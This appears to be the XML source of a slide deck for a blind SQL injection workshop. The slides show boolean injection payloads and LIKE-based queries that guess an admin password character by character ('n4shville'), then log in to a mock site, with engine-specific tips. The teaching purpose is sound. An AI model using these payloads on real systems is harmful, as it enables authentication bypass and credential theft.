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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="257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94" r:id="rId12"/>
    <p:sldId id="295" r:id="rId13"/>
    <p:sldId id="258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0" r:id="rId22"/>
    <p:sldId id="292" r:id="rId23"/>
    <p:sldId id="29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943EED-8ACC-4990-80B2-8F3153C16532}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="283"/>
            <p14:sldId id="257"/>
            <p14:sldId id="276"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="258"/>
            <p14:sldId id="284"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
            <p14:sldId id="291"/>
            <p14:sldId id="290"/>
            <p14:sldId id="292"/>
            <p14:sldId id="29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ACF"/>
    <a:srgbClr val="CC99FF"/>
    <a:srgbClr val="3C384E"/>
    <a:srgbClr val="4B4662"/>
    <a:srgbClr val="423D56"/>
    <a:srgbClr val="262331"/>
    <a:srgbClr val="800080"/>
    <a:srgbClr val="320032"/>
    <a:srgbClr val="302D3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2" autoAdjust="0"/>
    <p:restoredTop sz="88449" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="85" d="100"/>
          <a:sy n="85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32BD5-D9F3-41DA-B557-6AF7054C3B9B}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>15/10/2019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76A5-170C-410A-8A72-FEEAF706F5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17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1A6-BC3E-43F3-B898-5CD3A418D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A8C6-DBDF-44EB-A403-AA0F3AA30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F513-E5F2-4D0F-A706-BB19C25A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15/10/2019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6964F-B550-4842-971F-5ACD382E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C08B-EB25-49D6-B7E1-B7B8E39C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03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DE02-3F52-4C80-80BA-7B5DB9E9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B3435-5940-4925-B593-855E60C0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C4DA-9DD8-4DA9-8A01-8AEC67A9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15/10/2019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D277-40F9-4A21-A5E0-72EDDB11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6998-7736-4EB0-9EDE-0B1F8DE5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7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60092-C59B-4DFD-BD83-FE9C6531B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C3A55-B5F2-480B-986A-AAB898D09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70AF1-905C-45BC-B9B4-FE3F21D4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15/10/2019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6C17-89FE-4DB6-907B-51A98EEF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40D0-3ECF-4330-91DB-83319A3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954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4D13-D24C-4D8C-BDC1-BDD4DC3D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BA43-B990-4DD7-AEF0-DFAC949A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B686-9AC3-4845-B9B4-1AA7D61B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15/10/2019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23A0-6D03-40B5-8E5E-99BD0E50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66-5CB7-4813-95ED-191CD89A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506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CCB1-4DE4-4EDC-845A-F3C6010A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8EA14-4590-49EB-97FC-03D81147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C2422-1D4E-4381-AE85-EE531CA3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15/10/2019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C73A-47F5-48FC-9588-F2D8F74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7CA0-DAA8-47EB-AD2D-88754804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523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918-967F-4BFC-B563-B15728EA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092B-4377-46E3-860B-DC608FFF0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1837A-711E-4FE3-9FB3-BAC426C15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20ECA-86CF-4C37-B9B5-E1C38381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15/10/2019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F668F-FB95-41E1-A476-3D4E90D4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09AC6-4AA9-4FDF-81CA-D3F32711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25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81F0-142C-4ED1-8792-D114B57A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95FDA-29BC-4C06-BD1D-C0BC0CF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1CB6C-0EAA-4372-9DE2-95F2D995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0F38-51D4-496E-8734-25094D6E4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AEA4E-4BCB-4742-BB85-667E2ACBF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5E7D5-3D9C-4007-8B56-DB1ADDD0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15/10/2019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AE1F5-B20C-4DE3-81C4-FAB1F82F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D022F-8429-4232-B616-E65BBFB4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762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548E-8A66-4546-9D07-2788BA11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3B8A9-5368-443D-9E7D-02EAA78D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15/10/2019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3D2BE-FB87-466C-95E6-EC18A1A3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0D155-E017-4F34-A42D-8F35FB4C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650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CF7A7-FE22-49B9-B412-01D3B82F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15/10/2019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386E6-A1BE-43D6-BCFE-5C76501D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7A22B-CEB7-4F67-9EF0-C231F0B9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33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89E-286D-4F9D-8462-2231B0CD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2106-75C3-46B0-A6F5-C5E6F269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D0B9B-24F3-4879-9049-BDCF7974D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99D4B-D5AF-4268-B281-C16B5F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15/10/2019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796BC-688B-4581-8C84-9B7D5B1C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BF13-9BB6-4D9D-8341-2D9DCFC0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887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8839-9FFE-45B3-8BBA-4F4F089A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D7185-EA95-477D-8DC3-9EB74A19C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71C61-9190-4FE6-B311-15DDE4F3D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EF5E8-4882-462B-91AC-62B1E14E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15/10/2019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7C00D-EB03-4C7C-8246-C99244F8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6D56-28CD-4CF9-BA72-828313C3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714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3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1B3E5-952D-46CA-B464-9CD363EC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F9485-9704-4046-AE17-69DC576E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2E163-D77F-44FA-87D9-144F6FE69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C039-0959-4415-8AA5-45886C5F6194}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>15/10/2019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7437E-B81B-4132-B802-A9A8AB1BB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6F780-ED87-4E36-81E6-22BFFF873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086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18D3A4-00B1-48C5-8AFF-A7966A29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62" y="2095500"/>
            <a:ext cx="2667000" cy="2667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781885" y="3340220"/>
            <a:ext cx="783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Blind SQL Injection Workshop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781885" y="2095408"/>
            <a:ext cx="78308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MISC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B3878C-BFB6-4128-AEBB-6A915B94A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31" y="3261323"/>
            <a:ext cx="3537492" cy="9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9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 Every SQL Injection Is Easy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580C2-72E9-4E5C-A5C7-543154F9B406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1675923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{"error": "SQL Error"}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422059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 Every SQL Injection Is Easy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580C2-72E9-4E5C-A5C7-543154F9B406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1675923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{"error": "SQL Error"}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31ABF6-7A54-4522-ADD7-936DB4C5454F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2708314"/>
            <a:ext cx="579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or 1=1-- -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{"exists": true}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192038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 Every SQL Injection Is Easy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580C2-72E9-4E5C-A5C7-543154F9B406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1675923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{"error": "SQL Error"}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31ABF6-7A54-4522-ADD7-936DB4C5454F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2708314"/>
            <a:ext cx="579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or 1=1-- -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{"exists": true}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2EC1D4-2452-4157-A796-6389DE8B675C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="3740705"/>
            <a:ext cx="579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or 1=0-- -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{"exists": false}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163BE6-20AA-4395-9264-7A2B193880A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280985" y="4773096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this SQL injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3200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4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Idea: we can extract a bit of information per query.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SQL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operator, which is standard across all SQL implementations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3200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Idea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04BECD-D787-4170-9AEA-6336BCFD37C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="3632536"/>
            <a:ext cx="115252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the SQLite docs:</a:t>
            </a:r>
            <a:b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 percent symbol ("%") in the LIKE pattern matches any sequence of zero or more characters in the string. An underscore ("_") in the LIKE pattern matches any single character in the string.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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9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580C2-72E9-4E5C-A5C7-543154F9B406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1534298"/>
            <a:ext cx="10549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 or user='admin' and pass like 'a%'-- -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{"exists": false}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D0939-F972-4973-B068-9B0247E50AEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333372" y="2320765"/>
            <a:ext cx="10549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 or user='admin' and pass like 'b%'-- -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{"exists": false}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45CEE-FBAD-40B2-9EFC-0B80FBB3D9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="3151762"/>
            <a:ext cx="10549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 or user='admin' and pass like 'c%'-- -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{"exists": false}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10305-EE2B-43A6-95F4-697BE030C1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="4555121"/>
            <a:ext cx="10549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 or user='admin' and pass like 'm%'-- -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{"exists": false}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CCA1B-FAE0-40AB-A5D5-D03C90A505C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="5323702"/>
            <a:ext cx="10549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 or user='admin' and pass like 'n%'-- -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{"exists": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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51AC2-50EC-465A-AAE6-09EC54D38673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365967" y="4006899"/>
            <a:ext cx="126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004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580C2-72E9-4E5C-A5C7-543154F9B406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1534298"/>
            <a:ext cx="10719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 or user='admin' and pass like '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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%'-- -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{"exists": false}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D0939-F972-4973-B068-9B0247E50AEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333372" y="2320765"/>
            <a:ext cx="10719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 or user='admin' and pass like '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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nb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%'-- -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{"exists": false}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45CEE-FBAD-40B2-9EFC-0B80FBB3D9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="3151762"/>
            <a:ext cx="10719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 or user='admin' and pass like '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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nc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%'-- -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{"exists": false}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10305-EE2B-43A6-95F4-697BE030C1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="4555121"/>
            <a:ext cx="10719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 or user='admin' and pass like 'n3%'-- -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{"exists": false}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CCA1B-FAE0-40AB-A5D5-D03C90A505C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="5323702"/>
            <a:ext cx="10719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 or user='admin' and pass like 'n4%'-- -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{"exists": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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51AC2-50EC-465A-AAE6-09EC54D38673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365967" y="4006899"/>
            <a:ext cx="126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9189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Idea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51AC2-50EC-465A-AAE6-09EC54D38673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="126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02B05-FBDE-4B41-8B8A-D71CFF1FAA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1850259"/>
            <a:ext cx="11909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 or user='admin' and pass like 'n4shville%'-- -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{"exists": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AA5D1-56CF-43F6-8DEC-65988E1F6D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2736946"/>
            <a:ext cx="11739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GET /api/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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exists?user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 or user='admin' and pass like 'n4shville'-- -</a:t>
            </a:r>
          </a:p>
          <a:p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{"exists": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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594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Idea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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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/>
              <a:t>admin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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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/>
              <a:t>*********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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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85096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Idea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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2864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Nope, sorry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D890A79-6D60-4F16-90C6-6C30B0DA0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80" y="3470658"/>
            <a:ext cx="1764729" cy="17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7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Gotcha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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="112109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LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is case insensitive!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-AU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AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution varies by SQL Engine:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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LIKE BINARY</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU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AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLite: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(uses * and ? instead of % and _)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other DBs: Google it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407582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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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17107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Idea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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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/>
              <a:t>admin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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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/>
              <a:t>*********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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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24303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Idea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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="4053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Welcome, admin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DD3813-269D-40BA-AF07-177F62B36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96" y="3568710"/>
            <a:ext cx="1567308" cy="15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2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all the things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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="112109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Doing this by hand would be boring.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
